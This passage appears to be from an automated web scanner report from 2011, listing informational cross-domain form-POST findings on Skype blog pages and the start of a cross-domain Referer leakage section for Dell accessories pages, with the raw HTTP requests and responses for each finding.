Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:21 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 72889
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.115. http://blogs.skype.com/en/windows/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/windows/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/windows/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:22 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 71552
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.116. http://blogs.skype.com/en/windows_mobile/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/windows_mobile/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/windows_mobile/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:23 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 61123
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.117. http://blogs.skype.com/enterprise/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /enterprise/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /enterprise/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:21 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 57644
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=skypebusiness', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.118. http://blogs.skype.com/es/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /es/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /es/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:14 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 57359
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypees', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.119. http://blogs.skype.com/et/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /et/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /et/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:12 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 55910
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="et" lang="et">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeet', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.120. http://blogs.skype.com/fr/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /fr/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /fr/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:15 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 75359
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=skypefr', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.121. http://blogs.skype.com/garage/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /garage/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /garage/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:05 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 57867
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=skypegarage', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.122. http://blogs.skype.com/it/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /it/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /it/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:15 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 55500
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeit', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.123. http://blogs.skype.com/ja/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /ja/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /ja/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:12 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 60566
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="jp" lang="jp">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeja', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.124. http://blogs.skype.com/ko/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /ko/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /ko/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:17 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 54552
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="ko">
<head>
<title>Skype - Skype .........</title>
<meta name="description" content="Read blogs about the latest Skype news with Skype blogs" />
<meta name="keywords" conte
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=skype_korean', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.125. http://blogs.skype.com/linux/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /linux/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /linux/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:07 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 136114
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=skypeforlinux', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.126. http://blogs.skype.com/mac/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /mac/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /mac/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:05 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 54709
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=skypeformac', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.127. http://blogs.skype.com/pl/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /pl/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /pl/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:18 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 58234
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pl" lang="pl">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypepolski', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.128. http://blogs.skype.com/play/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /play/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /play/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:04 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 52934
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=skype_play', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.129. http://blogs.skype.com/pt/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /pt/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /pt/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:16 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 58394
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt" lang="pt">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypebrasil', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.130. http://blogs.skype.com/ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /ru/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /ru/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:19 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 58654
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="ru">
<head>
<title>Skype - Skype ........ ....cc......</title>

<meta http-equiv="content-type" content="text/html; charset=utf-8" />


<!-- Microsoft smarties -->
<meta h
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=skype_russkiy', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.131. http://blogs.skype.com/security/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /security/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /security/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:07 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 52462
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=skypesecurity', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.132. http://blogs.skype.com/zh-Hans/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /zh-Hans/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /zh-Hans/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:20 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 50254
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-Hans" lang="zh-Hans">
<head>
<titl
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=skype_chinese_s', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.133. http://blogs.skype.com/zh-Hant/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /zh-Hant/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /zh-Hant/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:20 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 60218
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-Hant" lang="zh-Hant">

<head>
<tit
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=skype_chinese_t', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.134. http://www.cgisecurity.com/lib/XmlHTTPRequest.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cgisecurity.com
Path:   /lib/XmlHTTPRequest.shtml

Issue detail

The page contains a form which POSTs data to the domain www.typepad.com. The form contains the following fields:

Request

GET /lib/XmlHTTPRequest.shtml HTTP/1.1
Host: www.cgisecurity.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Referrer+data+found+in+displayed+innerHTML#sclient=psy&hl=en&source=hp&q=Referrer+data+displayed+innerHTML&pbx=1&oq=Referrer+data+displayed+innerHTML&aq=f&aqi=&aql=&gs_sm=e&gs_upl=9979l11361l0l11816l9l8l0l0l0l1l906l906l6-1l1l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-PhApp: oak-tp-web035
X-Webserver: oak-tp-web035
Vary: cookie
Expires: Mon, 05 Sep 2011 06:23:12 GMT
Last-Modified: Mon, 19 Jan 2009 05:58:20 GMT
Content-Disposition: inline; filename=XmlHTTPRequest.shtml
Content-Type: text/html; charset=utf-8
Keep-Alive: timeout=300, max=100
Content-Length: 42599
Date: Mon, 05 Sep 2011 02:23:13 GMT
X-Varnish: 3033115944 3033114404
Age: 1
Via: 1.1 varnish

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <link rel="stylesheet" href="/i/styles.css" type="text/css" med
...[SNIP]...
</h3>
<form onsubmit="handleSubmit(this)" method="post" action="http://www.typepad.com/t/comments" name="comments_form">
<input type="hidden" name="static" value="1" />
...[SNIP]...

17. Cross-domain Referer leakage  previous  next
There are 113 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


17.1. http://accessories.us.dell.com/sna/DellPartsFamily.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /sna/DellPartsFamily.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /sna/DellPartsFamily.aspx?=us&cs=04&l=en&s=bsd&~topic=sna_parts_supplies&~ck=mn&category_id=7566&redirect=1&~ck=mn HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67566
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:06 GMT; path=/
Set-Cookie: StormSCookie=bandwidth=NA&js=1&flashversion=10; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:05 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Dell C
...[SNIP]...
<div class="footerlink"><a href="http://www.ideastorm.com/">Share Your Ideas</a>
...[SNIP]...

17.2. http://accessories.us.dell.com/sna/ShopAllBrands.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /sna/ShopAllBrands.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /sna/ShopAllBrands.aspx?c=us&l=en&cs=04 HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 166411
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:28 GMT; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:28 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Shop B
...[SNIP]...
<div class="footerlink"><a href="http://www.ideastorm.com/">Share Your Ideas</a>
...[SNIP]...

17.3. http://accessories.us.dell.com/sna/batteryconfig.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /sna/batteryconfig.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /sna/batteryconfig.aspx?c=us&l=en&s=bsd&cs=04 HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23838
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:19 GMT; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
